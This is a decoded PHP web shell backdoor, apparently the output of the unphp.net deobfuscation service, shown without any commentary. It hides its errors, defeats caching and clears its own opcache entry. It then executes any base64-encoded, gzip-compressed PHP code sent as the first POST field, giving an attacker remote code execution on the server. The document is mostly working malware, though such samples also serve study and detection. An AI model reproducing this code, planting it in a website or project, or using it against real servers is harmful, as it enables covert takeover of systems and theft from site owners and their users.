/* Decoded by unphp.net */ error_reporting(0); set_time_limit(0); ini_set('max_execution_time', 0); ini_set('memory_limit', -1); header('Expires: Tue, 01 Jan 1970 00:00:00 GMT'); header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0'); header('Cache-Control: post-check=0, pre-check=0', false); header('Pragma: no-cache'); if (function_exists('opcache_is_script_cached') && function_exists('opcache_invalidate')) { if (opcache_is_script_cached(__FILE__)) { opcache_invalidate(__FILE__, true); } } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $spd8f994 = array_shift($_POST); $sp5c02f3 = create_function('', gzinflate(base64_decode($spd8f994))); $sp5c02f3(); }